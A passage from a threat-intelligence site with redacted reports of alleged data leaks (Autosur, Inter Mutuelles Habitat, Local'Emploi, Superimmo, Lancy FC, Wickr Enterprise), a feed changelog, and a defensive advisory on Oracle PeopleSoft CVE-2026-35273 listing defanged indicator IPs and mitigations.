for-sale listing were posted to an underground forum; the sample data, the seller's contact details, and purchase information are **not** reproduced here. The claim has **not been independently confirmed** and Kuwaiti authorities have not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Over 63,000 Records Allegedly Leaked From French Vehicle Inspection Firm Autosur URL: https://darkwebinformer.com/over-63-000-records-allegedly-leaked-from-french-vehicle-inspection-firm-autosur/ Last updated: 2026-06-16T18:40:37.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Automotive ## Over 63,000 Records Allegedly Leaked From French Vehicle Inspection Firm Autosur Threat actors using the aliases **ChimeraZ** and **misere** have posted what they describe as a **partial database of Autosur** (autosur.fr), a French professional vehicle inspection and technical-control (*contrôle technique*) service used by car owners and dealerships. The leak is a **\~211 MB JSON dataset of about 63,349 inspection records covering roughly 20,193 people**, shared as sample files of around 25,000 and 38,000 records. Claimed fields include vehicle-owner names, postal addresses, cities, mobile and landline numbers, emails, **dates of birth and city of birth**, alongside vehicle data such as **license plates, VIN/serial numbers, make, model, and mileage**. The dataset's scope is **unverified**. Severity HIGH Data63.3K records PriceFree leak Country![France flag](https://flagcdn.com/w40/fr.png)France ActorChimeraZ ### ▣Post details TargetAutosur (autosur.fr), vehicle inspection Country![France flag](https://flagcdn.com/w40/fr.png)France SectorAutomotive / Vehicle Inspection ClaimPartial database leaked (JSON) Data\~63.3K records / \~20.2K people ObservedJun 16, 2026 PriceFree leak (reply-gated) ActorChimeraZ (with misere) ### !Allegedly included - \~63,349 inspection records (claimed) - \~20,193 individuals - 211 MB JSON dataset - Names, emails & phone numbers - Postal addresses & cities - Dates of birth & city of birth - License plates & VIN/serial - Vehicle make, model & mileage ### ◱Screenshot [ ![Autosur France alleged leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/798235498762349786253987698762351.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/798235498762349786253987698762351.png) ### ⚠Potential impact If authentic, this dataset is more sensitive than a typical directory leak because it pairs **identity PII** (names, home addresses, dates of birth, city of birth, phone numbers, and emails) with **vehicle identifiers** such as license plates, VIN/serial numbers, make, model, and mileage. That combination can fuel targeted phishing, fake inspection or recall notices, vehicle-related fraud, identity theft, and even physical-world targeting where a home address is tied to a specific car. A **reset\_password** field appears in the schema, but values are null in the samples, and no cleartext credentials or payment/financial data are referenced. The scope and authenticity are unconfirmed. ### iStatus Unverified Sample JSON records and download links were posted to an underground forum behind a reply-gate (“hidden content”); the sample records and download links are not reproduced here. The actors describe the data as a partial leak of the company's database. The claim has **not been independently confirmed** and Autosur has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### More Than 105,000 Records Allegedly Leaked From French Insurance Assistance Firm Inter Mutuelles Habitat URL: https://darkwebinformer.com/more-than-105-000-records-allegedly-leaked-from-french-insurance-assistance-firm-inter-mutuelles-habitat/ Last updated: 2026-06-16T18:15:23.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Insurance ## More Than 105,000 Records Allegedly Leaked From French Insurance Assistance Firm Inter Mutuelles Habitat A threat actor using the alias **ChimeraZ** has posted what they describe as a **partial database of Inter Mutuelles Habitat** (referenced as ima.eu / imha.fr), a French organization specializing in **home-insurance assistance and claims management** for policyholders of partner mutual insurers. The leak is presented as a **341 MB JSON file containing roughly 105,000 records** of insurance claim correspondence. Claimed fields include policyholder names, full postal addresses, landline and mobile phone numbers, claim (sinistre) references, invoice IDs, partner company names, SIRET numbers, and free-text case details. The dataset's scope is **unverified**. Severity HIGH Data\~105K records PriceFree leak Country![France flag](https://flagcdn.com/w40/fr.png)France ActorChimeraZ ### ▣Post details TargetInter Mutuelles Habitat (ima.eu / imha.fr) Country![France flag](https://flagcdn.com/w40/fr.png)France SectorInsurance / Claims Management ClaimPartial database leaked Data\~105K records, 341 MB JSON ObservedJun 16, 2026 PriceFree leak (reply-gated) ActorChimeraZ ### !Allegedly included - \~105,000 records (claimed) - 341 MB JSON file - Policyholder names - Full postal addresses - Landline & mobile numbers - Claim / sinistre references - Invoice IDs & case details - Partner names & SIRET ### ◱Screenshot [ ![Inter Mutuelles Habitat France alleged leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/345872379846529873659876235987623.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/345872379846529873659876235987623.png) ### ⚠Potential impact Because the actor presents this as a **leaked claims database**, the per-record sensitivity is high. The data reportedly ties policyholder PII, including full names, complete home and postal addresses, and landline and mobile phone numbers, to specific **insurance claims**, including claim references, invoice numbers, dates, and free-text correspondence describing incidents (storm, water, hail damage and similar) and remediation. Partner organizations appear with company names, addresses, and **SIRET** numbers. This pairing of identity and real, ongoing claim context is well suited to highly convincing claim-specific phishing and fraud, where an attacker references a genuine case to build trust, as well as address-based targeting and identity abuse. No passwords or payment-card data are referenced in the samples. The scope and authenticity are unconfirmed. ### iStatus Unverified Sample records and download links were posted to an underground forum behind a reply-gate (“hidden content”); the sample records and download links are not reproduced here. The actor describes the data as a partial leaked database of the organization. The claim has **not been independently confirmed** and Inter Mutuelles Habitat has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Nearly 27,000 Records Allegedly Leaked From French Job Platform Local'Emploi URL: https://darkwebinformer.com/nearly-27-000-records-allegedly-leaked-from-french-job-platform-localemploi/ Last updated: 2026-06-15T17:23:02.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Employment ## Nearly 27,000 Records Allegedly Leaked From French Job Platform Local'Emploi A threat actor using the alias **0xSec** has posted what they describe as the full **database of Local'Emploi** (localemploi.fr), a French public employment platform that aggregates local job offers, internships, permanent contracts, and training in the **Paris-Saclay area**. The leak is presented as **4 CSV files totalling roughly 26,900 records**: users.csv (11,272 rows), users\_with\_resume.csv (12,032 rows), offers.csv (3,487 rows), and companies.csv (143 rows). Claimed fields include candidate names, emails, phone numbers, dates of birth, postal codes and cities, account/verification flags, job offers, company contacts with SIRET numbers, and résumé references. Unlike a public scrape, the actor frames this as a **database leak**. The dataset's scope is **unverified**. Severity MEDIUM Data\~26.9K records PriceFree leak Country![France flag](https://flagcdn.com/w40/fr.png)France Actor0xSec ### ▣Post details TargetLocal'Emploi (localemploi.fr), job platform Country![France flag](https://flagcdn.com/w40/fr.png)France SectorEmployment / Recruitment ClaimDatabase leaked (4 CSV files) Data\~26.9K records across 4 files ObservedJun 15, 2026 PriceFree leak (reply-gated) Actor0xSec ### !Allegedly included - \~26,900 records (claimed) - 11,272 user records - 12,032 users with résumé refs - 3,487 job offers - 143 company records - Names, emails & phone numbers - Dates of birth, postal codes, cities - SIRET, company contacts, CV titles ### ◱Screenshots [ ![Local'Emploi France alleged leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/9235782398756897235689726359876234.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/9235782398756897235689726359876234.png) [ ![Local'Emploi France alleged leak Screenshot 2](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/9235782398756897235689726359876235.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/9235782398756897235689726359876235.png) ### ⚠Potential impact Because the actor presents this as a **database leak** rather than a public scrape, the per-record sensitivity is higher than a simple business directory. The user files reportedly contain job-seeker PII — full names, personal email addresses, phone numbers, **dates of birth**, postal codes and cities — alongside account and verification flags and references to uploaded **CVs / résumés**. The company file additionally lists contact names, emails, and **SIRET** business-registration numbers. This combination can support targeted phishing, recruitment and job-offer scams aimed at candidates, identity-related fraud, and bulk spam. No passwords, credentials, or financial/payment data appear in the listed fields. The scope and authenticity are unconfirmed. ### iStatus Unverified Sample rows and the download were posted to an underground forum behind a reply-gate (“hidden content”); the sample records and download links are not reproduced here. The actor describes the data as a leaked database of the platform. The claim has **not been independently confirmed** and Local'Emploi has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### 146K Records Allegedly Scraped From French Property Platform Superimmo URL: https://darkwebinformer.com/146k-records-allegedly-scraped-from-french-property-platform-superimmo/ Last updated: 2026-06-15T17:23:11.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Real Estate ## 146K Records Allegedly Scraped From French Property Platform Superimmo A threat actor using the alias **ChimeraZ** has posted what they describe as a **scrape of public data** from **Superimmo** (superimmo.com), a French real-estate platform that aggregates property listings from agencies and developers. The dataset is about **27 MB of CSV with roughly 146,000 records**, split between around 92,000 agencies and 53,000 property professionals, and includes business names, phone numbers, public agent profiles and social-media links, photo URLs, and listing details. The actor explicitly frames this as scraped **public** information rather than a system breach. The dataset's scope is **unverified**. Severity LOW Data146K records PriceFree leak Country![France flag](https://flagcdn.com/w40/fr.png)France ActorChimeraZ ### ▣Post details TargetSuperimmo (superimmo.com), property listings Country![France flag](https://flagcdn.com/w40/fr.png)France SectorReal Estate ClaimPublic data scraped and posted Data\~146K records (92K agencies, 53K pros) ObservedJun 15, 2026 PriceFree leak (reply-gated) ActorChimeraZ ### !Allegedly included - \~146,000 records (claimed) - \~92,000 agency listings - \~53,000 agent profiles - Business names & phone numbers - Public agent social profiles - Listing photos & URLs - Property listing details - Aggregated from public pages ### ◱Screenshot [ ![Superimmo France alleged data scrape Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/348960230985237659782635987623.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/348960230985237659782635987623.png) ### ⚠Potential impact Because the actor describes this as a **scrape of publicly available data**, the per-record sensitivity is low: it consists of business directory information, agency and agent names, business phone numbers, public social-media profiles, and property listings already published on Superimmo's website. The dataset's value comes from being aggregated and structured, which can aid bulk spam, cold outreach, lead harvesting, or competitor analysis, rather than from any private or secret data. There is no indication of consumer accounts, credentials, or financial information. The scope and authenticity are unconfirmed. ### iStatus Unverified Sample rows and free download links were posted to an underground forum; the sample records and download links are not reproduced here. As the actor describes it, the dataset is compiled from public listings rather than a system intrusion. The claim has **not been independently confirmed** and Superimmo has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Swiss Football Club Lancy FC Allegedly Breached, Member Data Leaked Online URL: https://darkwebinformer.com/swiss-football-club-lancy-fc-allegedly-breached-member-data-leaked-online/ Last updated: 2026-06-12T18:28:14.000Z Breach Report ![Switzerland flag](https://flagcdn.com/w40/ch.png)Switzerland Sports ## Swiss Football Club Lancy FC Allegedly Breached, Member Data Leaked Online A threat actor using the alias **ChimeraZ**, working with a collaborator named **Cybernox**, claims to have leaked the member database of **Lancy FC**, a Swiss football club based in Geneva that runs teams across all age groups. The dataset is small, about **2 MB of JSON covering roughly 6,600 members**, but reportedly detailed: names, home addresses, email addresses, multiple phone numbers, dates of birth, nationality, and playing details. Because the club serves all age groups, the data is likely to include **minors and parent contacts**, which makes it more sensitive than its size suggests. The claim is **unverified** and Lancy FC has not publicly addressed it. Severity MEDIUM Data6.6K members PriceFree leak Country![Switzerland flag](https://flagcdn.com/w40/ch.png)Switzerland ActorChimeraZ & Cybernox ### ▣Post details TargetLancy FC (football club, Geneva) Country![Switzerland flag](https://flagcdn.com/w40/ch.png)Switzerland SectorSports / Community Club ClaimMember database leaked Data\~6,600 member records (2 MB) ObservedJun 12, 2026 PriceFree leak ActorChimeraZ & Cybernox ### !Allegedly exposed - \~6,600 member records (claimed) - Full names & titles - Home addresses & postal codes - Email addresses - Private, pro & mobile numbers - Dates of birth & nationality - Likely youth members & parent contacts - Playing category & club details ### ◱Screenshot [ ![Lancy FC Switzerland alleged data leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/297438529387564982736498723235346.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/297438529387564982736498723235346.png) ### ⚠Potential impact If genuine, even a small club dataset like this is sensitive: it ties roughly **6,600 members** to home addresses, dates of birth, and several phone numbers each. Because Lancy FC runs youth football across all age groups, the records are likely to include **children and their parents' contact details**, which raises clear safeguarding concerns alongside the usual phishing and fraud risks. The small scale limits the breadth of impact, but the depth of personal detail, especially for any minors involved, is the main concern. Figures and authenticity are unconfirmed. ### iStatus Unverified Sample records and free download links were posted to an underground forum; because the dataset likely includes minors, none of the sample records, contact details, or download links are reproduced here. The claim has **not been independently confirmed** and Lancy FC has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Threat Feed 3.0 Changelog URL: https://darkwebinformer.com/threat-feed-3-0-changelog/ Last updated: 2026-07-12T22:52:57.000Z dwi@threat-feed:\~/release $ **diff** \--semantic feed@2.0 feed@3.0 --out changelog # Threat Feed 3.0 A large, additive release. The front-end roughly tripled with no removed user-facing features, and the realtime backend never moved. v2.0→v3.0· public release notes §01 Investigation ## Interactive Investigation Toolbox new 2.0 only had **automatic inline enrichment** that decorated threat cards. 3.0 keeps that and adds a set of **on-demand investigation tools** \- none of the underlying tool renderers existed in 2.0\. Confirmed tools and their stated purpose: - **Domain Lookup** \- RDAP / WHOIS + live threat reputation - **DNS Lookup** \- A / AAAA / MX / NS / TXT records via DNS-over-HTTPS - **IP Lookup** \- RDAP allocation + live threat reputation - **Reverse IP Lookup** \- other hosts on the same address - **ASN Lookup** \- network / BGP allocation - **Subdomain enumeration** \- discover hostnames under a target domain - **Certificate Transparency** \- issued-certificate history from CT logs - **CVE Lookup** \- full CVE detail with CWE references; includes a CVE gauge / ring visual - **Hash Lookup** \- file-hash reputation against malware-sample and sandbox sources - **IOC Lookup** \- generic indicator triage - **Email Auth** \- SPF / DKIM / DMARC / MX checks - **Reputation Check** \- threat-exchange pulses + IP abuse reputation + malware / phishing scan - **Breach Intel** \- public breach-notification datasets - **Credential Leak Search** \- email / username against public leak datasets - **Infostealer Check** \- stealer-log & combolist captures by email, username, or domain - **Brand Protect Lookup** \- lookalike-domain / typosquat detection - **Security News**, **Threat Intelligence Report**, **Backup**, and **Quick Filters & Views** Supporting infrastructure: tabbed tool panels, inline IOC rows with copy actions, gauges / rings / sparklines, and result caching. §02 Enrichment ## Expanded enrichment & new data sources Enrichment that already shipped in 2.0 (registration / WHOIS, malicious-URL scanning, IOC feeds, stealer-log lookups, screenshots, and TTP tactics) was **significantly expanded**, and several **new categories of external source** were wired in. The additions break down by capability: - **Certificate transparency** \- issued-certificate history for a host or domain. - **Network & routing** \- ASN / BGP allocation and reverse-IP neighbours. - **Internet exposure** \- open-port and service-exposure search. - **Malware intelligence** \- file-hash reputation across sample repositories and a sandbox source. - **Reputation & abuse** \- threat-exchange pulses and IP abuse scoring. - **Breach & leak** \- account breach notification and credential-leak datasets. - **Vulnerability data** \- CVE / CWE detail from public vulnerability databases. Existing sources also saw heavy use growth, and a handful of capabilities are **new from zero**: malicious-URL feeds, internet-exposure search, breach / leak lookups, IP and domain reputation, and subdomain discovery. §03 Workflow ## Triage & verdict workflow new A full per-threat triage system, persisted in dwi\_triage\_v1 and absent in 2.0: - Mark threats as **Investigating**, **Dismissed**, or **Accepted** with verdict pills (good / bad / neutral). - Live counters for investigating and dismissed items, with toggles to show or hide them. - **Mute categories**, with a persistent muted bar and one-click clear. - Verdict and evidence indicators (high / medium / low confidence). §04 Organisation ## Tagging, saved views & pivots new - **Tagging** \- apply custom tags to threats, stored in dwi\_threat\_tags\_v1. - **Saved views** \- save and restore filter / search configurations (dwi-saved-views-v1). - **Feed pivots & panel filters** \- pivot the feed by actor, category, or country and apply multi-facet panel filters. §05 Export ## Export overhaul - New **export filter panel** with facet combo-boxes for building precise export queries. - **Live export count + quota** shown before exporting, with reset-time formatting. - **HTML threat report** generation produces a standalone, shareable report, alongside the existing JSON / CSV / XML exports. - **State backup & restore** \- export and re-import local bookmarks, tags, triage, and views. §06 Cards ## Source branding & card redesign - Per-source **logos** with monogram fallbacks and a brand-icon cache. - New inline card actions: **bookmark**, **copy-URL**, **dismiss**, and **mute** on each card. - Entry animations for newly arriving alerts. §07 Correlation ## Related threats, reposts & actor claims new - **Related-threats** and **threat-summary** sections inside the detail modal. - **Repost detection** flags near-duplicate / cross-posted alerts. - **Actor-claim** UI surfaces which actor is claiming an incident. - **Watch terms** matching for tracked keywords. §08 Monitoring ## Forum & source monitoring upgrades - **Status-board monitoring** new \- polls an external uptime board, detects up / down state, pushes notification subscriptions, and drives a badge. - **Forum-status redesign** \- a ring / donut status visualization, a new **Evaluating** status alongside up / onboarding / maintenance / degraded / down / paused / unmonitored, and a collapsible forum-status section (dwi:fs-collapsed). §09 Charts ## New & enhanced charts - **Category Trend** chart. - **Month-over-month delta** card. - **CVE gauge / ring** and **abuse gauge** visuals. - **Trend signals** with sparklines. - TTP / tactic display refreshed with new legend and bar styling; the underlying tactic data existed in 2.0. §10 Interface ## UI / UX additions - **Custom timezone picker** \- a searchable dropdown replacing the native select, with a full bundled timezone list. - **"New since last visit" banner** with snooze (dwi\_last\_visit\_v1, dwi\_new\_since\_snooze\_until). - **Sidebar / rail** \- a collapsible left rail is injected; the bookmarks button moves into the rail and quick-stats merge into the header. Collapse state persists (dwi\_sb\_collapsed, dwi-sb-pinned). - **Bookmarks** now persist under dwi\_bookmarks\_v1; **notification history** under dwi\_notification\_history\_v1 with prefs bumped to v2. - **Defang / refang** \- IOCs are defanged when copied or exported (e.g. hxxp://, \[.\]) for safer sharing, with a copy-defanged action. - **Screenshot capture + OCR findings** expanded. §11 Privacy ## Privacy & consent new A **consent banner** with Accept / Decline, persisted in dwi\_consent\_v1 and posted to a consent API. It gates external behavior - confirm exactly which third-party lookups are blocked until consent is given. This matters for the public launch. // end of changelog - feed@3.0 Dark Web Informer · Live Threat Intelligence ### Threat Feed 3.0 URL: https://darkwebinformer.com/threat-feed/ Last updated: 2026-07-12T22:55:20.000Z _This post is for subscribers on the Plus, Pro and Elite tiers only._ ### Critical Oracle PeopleSoft PeopleTools RCE Exposes Enterprise Systems (CVE-2026-35273) URL: https://darkwebinformer.com/critical-oracle-peoplesoft-peopletools-rce-exposes-enterprise-systems-cve-2026-35273/ Last updated: 2026-06-11T19:48:36.000Z Critical CVSS 3.1 9.8 Oracle Alert Emergency Exploit Status Reported In The Wild # Critical Oracle PeopleSoft PeopleTools RCE Exposes Enterprise Systems (CVE-2026-35273) Oracle PeopleSoft Enterprise PeopleTools • Unauthenticated RCE • Published 2026-06-10 ## Vulnerability Overview [CVE-2026-35273](https://www.oracle.com/security-alerts/alert-cve-2026-35273.html) is a critical vulnerability in **Oracle PeopleSoft Enterprise PeopleTools**. Oracle says the flaw is remotely exploitable without authentication over HTTP and, if successfully exploited, may result in **remote code execution**. The vulnerability carries a CVSS v3.1 base score of **9.8 (Critical)**, with high impact to confidentiality, integrity, and availability. CVE ID CVE-2026-35273 CVSS Score 9.8 - Critical Vendor Oracle Component Updates Environment Management Affected Product PeopleSoft PeopleTools Affected Versions 8.61, 8.62 Attack Vector Network / HTTP Authentication Not Required Bottom Line If you run Oracle PeopleSoft Enterprise PeopleTools 8.61 or 8.62, treat this as an emergency. Oracle recommends immediate action, and administrators should apply the available mitigation or patch guidance from Oracle Support without delay. ## Why PeopleSoft Is a High-Value Target PeopleSoft deployments often support core enterprise functions such as human resources, finance, payroll, campus systems, and internal business workflows. That makes PeopleTools a high-value target because compromise can expose sensitive identity, employee, student, payroll, and operational data. A remotely exploitable unauthenticated flaw in this layer gives attackers a direct path toward systems that are often deeply integrated into the rest of the enterprise environment. ## Technical Analysis The vulnerable component identified by Oracle is **Updates Environment Management** within PeopleSoft Enterprise PeopleTools. Oracle's risk matrix lists the affected protocol as **HTTP**, and the CVSS vector indicates the issue is network reachable, low complexity, requires no privileges, and requires no user interaction. The CVSS vector is `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`. In practical terms, that means an attacker with network access to the vulnerable HTTP interface can attempt exploitation without valid credentials. Successful exploitation can result in complete compromise of PeopleSoft Enterprise PeopleTools, with high confidentiality, integrity, and availability impact. Oracle has not disclosed full technical exploit details in the public advisory, which is typical for emergency security alerts involving enterprise software. Defenders should avoid waiting for public exploit code or deeper technical writeups before acting, because the risk profile is already clear: unauthenticated network access, critical severity, and possible remote code execution. ## Exploitation Status Oracle's public advisory does not include a broad technical breakdown of exploitation activity, but outside reporting has described CVE-2026-35273 as being exploited in the wild, citing warnings from Mandiant leadership. That changes the operational priority from routine patch management to incident-response mode. Exposed or reachable PeopleSoft systems should be reviewed for compromise indicators while mitigation or patching is underway. ## Am I Affected? You are potentially affected if you operate **Oracle PeopleSoft Enterprise PeopleTools 8.61 or 8.62**. Oracle also notes that PeopleSoft Enterprise Applications customers may be affected because those applications depend on PeopleTools. Administrators should confirm the PeopleTools version in their environment and review the Oracle Support patch availability document linked from the official alert. ## Affected Versions & Fixes | Product | Affected Versions | Resolution | | ---------------------------------- | --------------------------------- | ------------------------------------------------------------------------------------------------------------- | | PeopleSoft Enterprise PeopleTools | 8.61, 8.62 | Apply Oracle's Security Alert mitigation or patch guidance through the PeopleSoft Patch Availability Document | | PeopleSoft Enterprise Applications | Dependent on PeopleTools exposure | Review the underlying PeopleTools version and follow Oracle Support guidance | Oracle states that customers should remain on actively supported versions and apply Critical Patch Updates, Critical Security Patch Updates, and Security Alerts without delay. Older unsupported releases may not be tested, but Oracle warns that earlier affected releases are likely to be affected and recommends upgrading to supported versions. ## Mitigation & Remediation Priority order, drawn from the [Oracle Security Alert Advisory for CVE-2026-35273](https://www.oracle.com/security-alerts/alert-cve-2026-35273.html): 1. **Apply Oracle's official mitigation or patch guidance.** Review the PeopleSoft Patch Availability Document in Oracle Support and deploy the recommended fixes for PeopleTools 8.61 and 8.62. 2. **Reduce HTTP exposure.** Restrict PeopleSoft administrative and application interfaces to trusted networks only, and block unnecessary internet-facing access. 3. **Prioritize supported versions.** Oracle notes that unsupported releases may not be tested for this vulnerability, so upgrade planning should be treated as part of remediation. 4. **Hunt for suspicious activity.** Review PeopleSoft web logs, authentication logs, update management activity, unexpected process execution, and anomalous outbound connections from PeopleSoft hosts. 5. **Monitor for follow-on compromise.** Because successful exploitation may lead to remote code execution, check for new files, modified application components, unexpected scheduled jobs, and suspicious administrative account activity. ## The Bigger Picture CVE-2026-35273 is another reminder that enterprise application platforms are high-impact targets, especially when they sit behind business-critical HR, payroll, finance, and identity workflows. PeopleSoft environments are often long-lived, heavily customized, and difficult to patch quickly, which makes emergency alerts like this especially risky. When a flaw is unauthenticated, reachable over HTTP, and rated 9.8, the safest assumption is that attackers will move fast. ## Observed IOCs The following IP addresses have been reported in connection with CVE-2026-35273 activity. Treat these as investigation leads, not standalone proof of compromise. | Type | Indicator | Notes | | ---- | ------------------ | ----------------------- | | IPv4 | 142.11.200\[.\]186 | Reported infrastructure | | IPv4 | 142.11.200\[.\]187 | Reported infrastructure | | IPv4 | 142.11.200\[.\]188 | Reported infrastructure | | IPv4 | 142.11.200\[.\]189 | Reported infrastructure | | IPv4 | 142.11.200\[.\]190 | Reported infrastructure | | IPv4 | 108.174.202\[.\]99 | Reported infrastructure | | IPv4 | 176.120.22\[.\]24 | Reported infrastructure | ## References - [Oracle Security Alert Advisory - CVE-2026-35273](https://www.oracle.com/security-alerts/alert-cve-2026-35273.html) - [Oracle Security Blog - Security Alert CVE-2026-35273 Released](https://blogs.oracle.com/security/security-alert-cve-2026-35273-released) - [CVE Record - CVE-2026-35273](https://www.cve.org/CVERecord?id=CVE-2026-35273) - [Help Net Security - Oracle PeopleSoft Servers Under Attack](https://www.helpnetsecurity.com/2026/06/11/oracle-peoplesoft-under-attack-cve-2026-35273/) - [The Hacker Wire - Critical PeopleSoft PeopleTools Unauthenticated Takeover](https://www.thehackerwire.com/critical-peoplesoft-peopletools-unauthenticated-takeover-cve-2026-35273/) ### Amazon's Wickr Enterprise Admin API Access and Payment Keys Allegedly Leaked on Hacking Forum URL: https://darkwebinformer.com/amazons-wickr-enterprise-admin-api-access-and-payment-keys-allegedly-leaked-on-hacking-forum/ Last updated: 2026-06-11T16:43:17.000Z Breach Report ![United States flag](https://flagcdn.com/w40/us.png)United States Technology ## Amazon's Wickr Enterprise Admin API Access and Payment Keys Allegedly Leaked on Hacking Forum A threat actor using the alias **Orcinusorca** claims to have gained deep access to the production infrastructure of **Wickr Enterprise**, the AWS-owned secure enterprise messaging platform. In a post framed as a "leak," the actor shares what they describe as **proof of access to the production Admin API** (via CloudFront/Envoy) and says they obtained **internal API keys and Braintree production payment keys**. The evidence shown is a set of HTTP response headers and a small JSON snippet rather than a data dump. The claim is **unverified**, the evidence is limited, and Amazon/Wickr has not publicly addressed it. Severity HIGH ImpactAdmin API access TypeAccess + key leak Country![United States flag](https://flagcdn.com/w40/us.png)United States ActorOrcinusorca ### ▣Post details TargetWickr Enterprise (Amazon AWS) Country![United States flag](https://flagcdn.com/w40/us.png)United States SectorTechnology / Secure Messaging ClaimProduction Admin API access + leaked keys EvidenceResponse headers + JSON snippet ObservedJun 11, 2026 Data dumpNone shown ActorOrcinusorca (new account) ### !What is claimed - Production Admin API access (claimed) - Internal API keys (claimed leaked) - Braintree production payment keys - AWS internal admin console reference - Envoy / CloudFront infrastructure detail - Secure enterprise messaging platform - No user-data dump shown - New, unproven forum account ### ◱Screenshot [ ![Wickr Enterprise alleged admin API access Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/123587923987654987623569867235987.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/123587923987654987623569867235987.png) ### ⚠Potential impact If genuine, access to the **production Admin API** of a secure enterprise messaging platform, together with leaked **internal API keys and production payment-processing keys**, would be a serious infrastructure compromise: payment keys could enable fraud, and admin-level access to a product marketed for confidential communications is especially sensitive given its enterprise and government user base. That said, the "proof" shown is limited to response headers and a short JSON snippet, which do not by themselves establish admin control; the account is brand-new, and the framing is grandiose. Claims of this kind are frequently exaggerated. If the access and keys are real the impact could be critical, but as presented it is unverified and warrants caution. ### iStatus Unverified The actor posted response headers and a JSON snippet as "proof of access" on an underground forum; the leaked keys and any specific endpoint or host details are not reproduced here. We have not validated the access or the keys, and as a precaution any named keys should be treated as potentially compromised pending review. The claim has **not been independently confirmed** and Amazon/Wickr has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Hacker Claims to Leak Data on 389K People From French Valuation Firm Jestimo URL: https://darkwebinformer.com/hacker-claims-to-leak-data-on-389k-people-from-french-valuation-firm-jestimo/ Last updated: 2026-06-11T16:29:17.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Real Estate ## Hacker Claims to Leak Data on 